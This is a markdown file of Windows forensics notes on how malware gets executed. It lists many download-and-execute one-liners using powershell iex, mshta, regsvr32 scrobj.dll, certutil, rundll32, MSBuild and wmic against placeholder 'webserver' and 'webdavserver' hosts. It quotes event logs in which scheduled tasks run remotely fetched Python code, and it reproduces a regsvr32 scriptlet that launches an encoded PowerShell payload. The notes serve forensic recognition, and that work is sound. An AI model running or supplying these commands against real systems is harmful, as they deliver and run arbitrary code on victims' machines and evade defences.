Skip to content

Latest commit

 

History

History
85 lines (58 loc) · 4.87 KB

forensics-windows-malware.md

File metadata and controls

85 lines (58 loc) · 4.87 KB
Raw

Forensics miscellaneous

powershell malware

> powershell -c "anystring|iex"
> powershell  -noP -sta -w 1 -enc base64string

executing web delivered malware

arno0x0x: Windows oneliners to download remote payload and execute arbitrary code. depending on download way, the artefacts might end up in downloader component cache

> powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
> powershell -exec bypass -f \\webdavserver\folder\payload.ps1

> cmd.exe /k < \\webdavserver\folder\batchfile.txt

> cscript //E:jscript \\webdavserver\folder\payload.txt

> mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
> mshta http://webserver/payload.hta
> mshta \\webdavserver\folder\payload.hta

> rundll32 \\webdavserver\folder\payload.dll,entrypoint
> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

> wmic os get /format:"https://webserver/payload.xsl"

> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

> regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
> regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

> odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

> cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

> certutil -urlcache -split -f http://webserver/payload payload
> certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
> certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Other

malware can be delivered by virtualization platform

"25.04.2018 12:44:52","A new process has been created.","C:\Program Files\VMware\VMware Tools\vmtoolsd.exe","NT AUTHORITY\SYSTEM","0x15e8","C:\Windows\System32\cmd.exe","""cmd.exe"" /s /c cmd >C:\Users\PILOT~1.OPE\AppData\Local\Temp\powerclivmware177 2>&1 /s /c ""schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr ""python -c \""import urllib2; exec urllib2.urlopen(\\\""http://a.b.c.d:80/b\\\"").read();\"""" /st 13:00 /F & schtasks /run /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 & ping 127.0.0.1 -n 6 > nul & schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr "" - MGMT STUFF - "" /st 13:00 /F & schtasks /delete /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /F"""

RuntimeBroker.exe

A standard component from Windown 10 connected to ui(metro?) and store. The documentation states that it controlls permissions of apps from store, but also it executes commands and programs when full path (eg. powershell.exe) is typed into Start searchbox. On search and click, the program is spawned by explorer.exe, but on enter it is spawned by RuntimeBroker.exe. Also, any invocation of microsoft egde is handled by RuntimeBroker.exe. There is probably a way how to hook startup app to the broker ...

"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\NETWORK SERVICE","0x1b1c","C:\Windows\System32\rdpclip.exe","rdpclip"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x1c34","C:\Windows\System32\AtBroker.exe","atbroker.exe"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x276c","C:\Windows\System32\LogonUI.exe","""LogonUI.exe"" /flags:0x0 /state0:0xa1e48055 /state1:0x41c64e6d"
...
"26.04.2018 11:26:00","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\SYSTEM","0x1988","C:\Windows\System32\RuntimeBroker.exe","C:\Windows\System32\RuntimeBroker.exe -Embedding"
"26.04.2018 11:26:03","A new process has been created.","C:\Windows\System32\RuntimeBroker.exe","BACKUPPILOT\pilot.operator","0x25f0","C:\Windows\System32\regsvr32.exe","""C:\Windows\System32\regsvr32.exe"" /u /n /s /i:http://domainx/g.html scrObj.dll"

regsvr32 download scriptlet

C:\Windows\system32\regsvr32.exe /u /n /s /i:http://domain/g.html scrObj.dll

<?XML version="1.0"?>
<scriptlet>
	<registration description="Win32COMDebug" progid="Win32COMDebug" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run('powershell -noP -sta -w 1 -enc SQBmACgAJABQ...');
]]>
</script>
	</registration>
	<public><method name="Exec"></method></public>
</scriptlet>